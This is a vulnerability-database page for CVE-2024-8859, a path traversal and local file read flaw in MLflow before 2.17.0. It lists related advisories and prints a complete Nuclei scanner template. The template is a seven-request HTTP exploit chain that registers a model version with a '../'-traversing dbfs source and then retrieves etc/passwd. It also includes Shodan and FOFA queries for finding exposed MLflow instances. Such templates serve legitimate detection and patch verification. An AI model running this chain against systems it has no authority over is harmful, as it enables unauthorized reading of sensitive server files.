| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| MLflow 安全漏洞 | 20 Mar 202500:00 | – | cnnvd | |
| CVE-2024-8859 | 20 Mar 202510:09 | – | cve | |
| CVE-2024-8859 Path Traversal in mlflow/mlflow | 20 Mar 202510:09 | – | cvelist | |
| MLflow has a Local File Read/Path Traversal in dbfs | 20 Mar 202512:32 | – | github | |
| CVE-2024-8859 | 20 Mar 202510:15 | – | nvd | |
| BIT-MLFLOW-2024-8859 Path Traversal in mlflow/mlflow | 6 Aug 202505:45 | – | osv | |
| GHSA-4RQF-8PFM-P36R MLflow has a Local File Read/Path Traversal in dbfs | 20 Mar 202512:32 | – | osv | |
| PYSEC-2026-1638 MLflow has a Local File Read/Path Traversal in dbfs | 7 Jul 202614:34 | – | osv | |
| PT-2025-12247 | 20 Mar 202500:00 | – | ptsecurity | |
| MLflow has a Local File Read/Path Traversal in dbfs | 7 Jul 202614:34 | – | pypa |
id: CVE-2024-8859
info:
name: Mlflow < 2.17.0 - Local File Inclusion
author: gy741
severity: critical
description: |
Mlflow before 2.17.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
impact: |
Successful exploitation could allow an attacker to read sensitive files on the server.
remediation: |
Upgrade Mlflow to version 2.17.0 or later to mitigate the vulnerability.
reference:
- https://huntr.com/bounties/2259b88b-a0c6-4c7c-b434-6aacf6056dcb
- https://github.com/mlflow/mlflow/pull/13161
- https://nvd.nist.gov/vuln/detail/CVE-2024-8859
classification:
epss-score: 0.02484
epss-percentile: 0.8266
metadata:
max-request: 7
vendor: lfprojects
product: mlflow
shodan-query: http.title:"mlflow"
fofa-query:
- title="mlflow"
- app="mlflow"
tags: cve2024,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects,vuln
http:
- raw:
- |
POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name": "{{randstr}}", "artifact_location": "dbfs:/"}
- |
POST /api/2.0/mlflow/runs/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"experiment_id": "{{EXPERIMENT_ID}}"}
- |
POST /ajax-api/2.0/mlflow/upload-artifact?run_uuid={{RUN_ID}}&path=a?/a HTTP/1.1
Host: {{Hostname}}
whatever
- |
POST /ajax-api/2.0/mlflow/experiments/delete HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"experiment_id": "{{EXPERIMENT_ID}}"}
- |
POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name": "{{randstr}}"}
- |
POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name": "{{randstr}}", "source": "dbfs:/{{RUN_ID}}/artifacts/a%3f/../../../../../../../../../../../../"}
- |
GET /model-versions/get-artifact?name={{randstr}}&version=1&path=etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
extractors:
- type: json
part: body_1
name: EXPERIMENT_ID
group: 1
json:
- '.experiment_id'
internal: true
- type: json
part: body_2
name: RUN_ID
group: 1
json:
- '.run.info.run_id'
internal: true
# digest: 4a0a00473045022100f5c585c0605286f47b908ec0af0ee0763e1f1942fc472d4de2d9c02ac20a0df302204eff4a254186aa8b424555b19c3dabf7b0b760d8448e107dc3f02687fa25c68b:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation